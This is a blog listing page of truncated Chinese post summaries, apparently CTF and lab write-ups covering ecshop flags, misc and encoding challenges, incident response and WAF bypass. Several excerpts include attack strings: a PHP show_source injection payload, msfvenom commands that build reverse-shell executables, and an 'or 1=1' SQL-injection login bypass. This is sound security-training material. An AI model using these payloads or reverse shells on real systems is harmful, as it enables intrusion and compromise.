摘要:
任务一 访问服务器8080端⼝,找出ecshop版本号,将版本号作为flag提交**(数字)** 通过访问http://IP:8080 可以看到页面首页存在版本信息 访问网站,利用漏洞找到网站根目录的flag1,将flag1作为flag提交。 因为在网站根目录,直接尝试访问http://IP/fla 阅读全文
posted @ 2022-06-13 10:09
Rlins
阅读(464)
评论(0)
推荐(0)
摘要:
第二阶段 任务一 第一题: ?dcn=);show_source("flag.php");// 第二题:输入密码查看flag 密码是:13546 第三题:修改前端输入框大小 第四题:burp抓包--res模块重放 第五题:wireshark 第242包追中http流 读取flag到burp解密 任务 阅读全文
posted @ 2022-06-13 10:08
Rlins
阅读(190)
评论(0)
推荐(0)
摘要:
Meterpreter Shell: msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8080 -f exe > reverse.exe msfvenom -p windows/shell_reverse_tcp L 阅读全文
posted @ 2022-06-13 10:06
Rlins
阅读(117)
评论(0)
推荐(0)
摘要:
WAF是如何被绕过的 课程简介 WAF(Web应用防火墙,Web Application Firewall的简称)是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的产品。WAF可以发现和拦截各类Web层面的攻击,记录攻击日志,实时预警提醒,在Web应用本身存在缺陷的情况下 阅读全文
posted @ 2022-06-13 10:05
Rlins
阅读(378)
评论(0)
推荐(1)
摘要:
应急响应 宏观题 1. 思路流程 信息收集>类型判断>抑制范围>深入分析>清理处置>输出报告 收集信息:收集客户信息和中毒主机信息,包括样本 判断类型:判断是否是安全事件,何种安全事件,勒索、挖矿、断网、DoS 等等 抑制范围:隔离使受害⾯不继续扩⼤ 深入分析:日志分析、进程分析、启动项分析、样本分 阅读全文
posted @ 2022-06-13 10:03
Rlins
阅读(2035)
评论(0)
推荐(1)
摘要:
编码 进制 十进制:20 八进制:024 十六进制:0x14 key和flag对应的ASCII key 107 101 121 KEY 75 69 89 flag 102 108 97 103 FLAG 70 76 65 71 Unicode 编码 例如:原文本:You had me at hell 阅读全文
posted @ 2022-06-13 10:03
Rlins
阅读(1571)
评论(0)
推荐(0)
摘要:
MISC 1. Utf-7解密 win7中utf-7工具解密 2. Wireshark分析 筛选http请求包,追踪流 3. wireshark文件导出 导出对象>>>http 4. png文件头补全 winhex打开文件,修改文件头89504E47为png文件头,打开图片得flag 504E47 阅读全文
posted @ 2022-06-13 09:56
Rlins
阅读(260)
评论(3)
推荐(0)
摘要:
第一题 打开页面发现http://10.196.8.21:18083/calculate/ 利用python的requests库做计算, import re import requests import time url = 'http://10.196.8.21:18083/calculate/' 阅读全文
posted @ 2022-06-13 09:51
Rlins
阅读(516)
评论(0)
推荐(0)
摘要:
title: 记录对permate漏洞挖掘 categories: ctf 1.反射型xss 搜索框尝试xss语句,发现存在反射型xss 2.SQL注入 存在sql注入 --+注释,发现存在11个字段 http://10.196.8.31/home/index.php?m=tiezi&a=index 阅读全文
posted @ 2022-06-13 09:46
Rlins
阅读(86)
评论(0)
推荐(0)
摘要:
title: 记录对Piti's wonderful blog漏洞挖掘 categories: ctf 1.首页发现收索框,尝试xss,发现存在反射型xss漏洞 2.首页发现一个登陆框,发现万能用户登陆 admin’ or ‘1’=’1’ 3.用户登陆后看到写文章版,尝试存储型xss,过滤<scri 阅读全文
posted @ 2022-06-13 09:44
Rlins
阅读(27)
评论(0)
推荐(0)
摘要:
第一题:ASCII解码 第二题:base64 缺一半的64 不就是32 第三题:Escape 第四题:16进制 第五题:JSFUCK 第六题:quoted-printable 第七题:unicode 第八题:url 第十题:莫斯 阅读全文
posted @ 2022-06-13 09:43
Rlins
阅读(45)
评论(0)
推荐(0)
摘要:
HCTF-2018——WarmUp 打开页面F12发现 <!--source.php--> 访问这个页面,给出源码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whi 阅读全文
posted @ 2022-06-13 09:36
Rlins
阅读(92)
评论(0)
推荐(0)
摘要:
题目一: $username = @clean((string)$_GET['username']); $password = @clean((string)$_GET['password']); 传参username和password对数据库做查询 $str=stripslashes($str); 阅读全文
posted @ 2022-06-13 09:32
Rlins
阅读(103)
评论(0)
推荐(0)
摘要:
unicode解密 \u5927\u5bb6\u597d\uff0c\u6211\u662f\u0040\u65e0\u6240\u4e0d\u80fd\u7684\u9b42\u5927\u4eba\uff01\u8bdd\u8bf4\u5fae\u535a\u7c89\u4e1d\u8fc7\u 阅读全文
posted @ 2022-06-13 09:31
Rlins
阅读(188)
评论(0)
推荐(0)

浙公网安备 33010602011771号